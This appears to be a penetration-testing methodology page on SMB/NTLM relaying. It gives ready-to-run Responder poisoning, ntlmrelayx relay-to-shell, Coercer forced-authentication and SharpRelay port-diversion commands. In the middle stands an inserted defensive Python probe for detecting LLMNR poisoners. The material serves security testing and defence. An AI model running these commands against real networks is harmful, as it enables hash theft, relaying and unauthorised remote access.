SMB relaying
Prerequisites for SMB relaying (external link)
Methodology
To relay to SMB, we have the following tools at our disposal:
- Responder to poison NetBIOS (NBT-NS), LLMNR and mDNS and capture NTLM hashes, which can either be cracked offline or used for NTLM relaying (our Windows version).
- ntlmrelayx to relay incoming traffic to other hosts and protocols and spawn e.g. an SMB shell.
- SharpRelay (or our version) to divert traffic destined for SMB to another port on a Windows machine. Useful when we want to use Responder or ntlmrelayx on a Windows machine.
- Coercer to coerce other hosts to initiate a connection.
You can use Respotter in your environment to detect active poisoning.
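As an added example (not from this page, and not Respotter's code), a minimal Python probe in the same spirit: it asks LLMNR for a random name that no host owns, so any answer it receives can only come from a poisoner. Function names, the probe name prefix and the 2-second timeout are my own choices.

```python
import os
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # LLMNR multicast group and UDP port

def build_llmnr_query(name: str, txid: int) -> bytes:
    # Header: ID, flags=0 (query), QDCOUNT=1, AN/NS/AR=0; QNAME as length-prefixed labels; QTYPE=A, QCLASS=IN
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack(">HH", 1, 1)

def _skip_name(pkt: bytes, off: int) -> int:
    # Advance past a DNS-style name; a compression pointer (0xC0..) is two bytes and ends the name
    while pkt[off] != 0 and pkt[off] & 0xC0 != 0xC0:
        off += pkt[off] + 1
    return off + (2 if pkt[off] & 0xC0 == 0xC0 else 1)

def parse_llmnr_answers(pkt: bytes, txid: int) -> list:
    """IPv4 addresses from the A answers of a response matching our transaction ID (else [])."""
    rid, flags, qd, an = struct.unpack(">HHHH", pkt[:8])
    if rid != txid or not flags & 0x8000:  # wrong ID, or the QR bit is not set (not a response)
        return []
    off, addrs = 12, []
    for _ in range(qd):
        off = _skip_name(pkt, off) + 4  # skip QNAME, QTYPE, QCLASS
    for _ in range(an):
        off = _skip_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(pkt[off:off + 4]))
        off += rdlen
    return addrs

def probe_for_poisoner(timeout: float = 2.0) -> dict:
    """Ask LLMNR for a random name nobody owns; map each answering IP to the addresses it claimed."""
    name, txid = "spot-" + os.urandom(4).hex(), int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = {}
    try:
        while True:
            data, (src, _) = sock.recvfrom(2048)
            if answers := parse_llmnr_answers(data, txid):
                hits[src] = answers  # no legitimate host owns this name: likely a poisoner
    except socket.timeout:
        pass
    return hits
```

Run it as a normal user on the segment you want to check; the same idea applies to NBT-NS (UDP 137) and mDNS (UDP 5353), which this example does not cover.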
```sh
# Install Responder
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
# Run Responder; first deactivate the built-in SMB and HTTP servers in Responder.conf,
# so that incoming connections reach ntlmrelayx instead of Responder's own servers
sudo python3 Responder.py -I eth0
# Run ntlmrelayx to relay to the targets listed in targets.txt (-i spawns an interactive shell)
python ./examples/ntlmrelayx.py -smb2support -tf targets.txt -i
# Optionally, coerce other hosts to authenticate to our attacker machine
python -m coercer coerce -u {username} -p {password} -t {ip}
```
On Windows you can build our version of Responder. To use it, you also need SharpRelay (Syslifters version) and must place Responder.conf next to the executable. This way, we get NTLM hashes directly into Responder.
```powershell
# Run SharpRelay in a dedicated process (requires admin)
SharpRelay.exe svcname C:\Path\To\WinDivert64.sys 445 8445
# Run Responder to discover NTLM hashes (or poison mDNS for more results)
Responder.exe -I Ethernet
```
SharpRelay
To enable relaying on Windows hosts, we can use SharpRelay. It diverts incoming traffic (e.g. SMB on port 445) to another local port using WinDivert. Admin access is required.
The absolute path must be used when specifying the driver, e.g.:
```powershell
# Divert incoming SMB traffic from port 445 to local port 8445 (absolute driver path required)
SharpRelay.exe mynewservice C:\Path\To\WinDivert64.sys 445 8445
```
```powershell
# Run ntlmrelayx listening on the diverted port 8445
python ./examples/ntlmrelayx.py -smb2support --smb-port 8445 -t smb://10.0.0.3
```
```powershell
# Optionally, coerce other hosts to authenticate to our machine
python -m coercer coerce -u {username} -p {password} -t {ip}
```
ntlmrelayx troubleshooting
When installing ntlmrelayx via pipx or other means, you may need the following cryptography and pyOpenSSL versions:
```powershell
pip install cryptography==41.0.7
pip install pyOpenSSL==23.2.0
```